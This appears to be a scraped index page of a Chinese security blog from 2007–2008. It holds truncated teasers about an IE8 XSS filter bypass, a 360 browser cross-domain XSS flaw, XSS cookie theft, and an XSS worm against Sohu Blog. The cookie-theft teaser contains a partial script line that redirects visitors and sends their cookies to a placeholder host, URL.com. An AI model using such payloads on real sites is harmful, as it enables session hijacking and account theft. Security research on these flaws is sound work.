IE8 XSS Filter Bypass

作者:天晴无名氏日期:2008-09-05 23:20

漏洞说明：IE8是微软新推出的一款浏览器，其对CSS2.1的完整支持，HTML5的支持，内置开发工具等等。IE8在浏览器安全性上有非常大的改进，内置了一款无法卸载的Xss Filter，对非持久型跨站脚本攻击做了比较好的防护。但是80sec在测试IE8时发现，IE8的Xss Filter存在漏洞，导致在一些东方国家的版本里根本不能阻止URL Xss，譬如在中文版本里，利用一些简单的数据就可以Byp

[阅读全文]

标签: IE8 XSS

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 83

360安全浏览器本地xss跨域漏洞

作者:天晴无名氏日期:2008-06-25 12:07

产品官方：360安全浏览器是全球首款采用“沙箱”技术的浏览器，能够彻底避免木马病毒从网页上对你的计算机发起攻击。360安全浏览器完全突破了传统的以查杀、拦截为核心的安全思路，在计算机系统内部构造了一个独立的虚拟空间——“360沙箱”，使所有网页程序都密闭在此空间内运行。因此，网页上任何木马、病毒、恶意程序的攻击都会被限制在&l

[阅读全文]

标签: 360安全浏览器本地 xss 跨域漏洞

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 127

XSS攻击Cookie欺骗中隐藏JavaScript执行

作者:天晴无名氏日期:2008-04-02 12:30

比如发现一处可XSS地方：<script>alert(不管怎么样弹出就好)</script>

自己弄个偷cookie的文件。

目的是让其他浏览者去浏览我们设计好的陷阱

<script>document.location='http://URL.com/cookie.php?cookie='+escape(document.co

[阅读全文]

标签: XSS 攻击 Cookie 欺骗 JavaScript

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 165

完整的XSS wrom入侵实现流程

作者:天晴无名氏日期:2007-11-03 12:43

不说废话，且看怎么实现，我先拿SOHU BLOG做示范.

1.测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,/前是真正的空格),在个人档案处看过滤了哪些.

’’;:!--"<javascript JAvaSCriPT>=&#{()} /

结果

’’;:

[阅读全文]

标签: XSS 入侵流程

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 249

IE8 XSS Filter Bypass

作者:天晴无名氏日期:2008-09-05 23:20

360安全浏览器本地xss跨域漏洞

作者:天晴无名氏日期:2008-06-25 12:07

XSS攻击Cookie欺骗中隐藏JavaScript执行

作者:天晴无名氏日期:2008-04-02 12:30

完整的XSS wrom入侵实现流程

作者:天晴无名氏日期:2007-11-03 12:43

Other

类别

日历

最新日志

用户面板

最新评论

最新留言

归档

统计

Google Search

搜索

链接

订阅本站

IE8 XSS Filter Bypass

作者:天晴无名氏 日期:2008-09-05 23:20

360安全浏览器本地xss跨域漏洞

作者:天晴无名氏 日期:2008-06-25 12:07

XSS攻击Cookie欺骗中隐藏JavaScript执行

作者:天晴无名氏 日期:2008-04-02 12:30

完整的XSS wrom入侵实现流程

作者:天晴无名氏 日期:2007-11-03 12:43

Other

类别

日历

最新日志

用户面板

最新评论

最新留言

归档

统计

Google Search

搜索

链接

订阅本站

作者:天晴无名氏日期:2008-09-05 23:20

作者:天晴无名氏日期:2008-06-25 12:07

作者:天晴无名氏日期:2008-04-02 12:30

作者:天晴无名氏日期:2007-11-03 12:43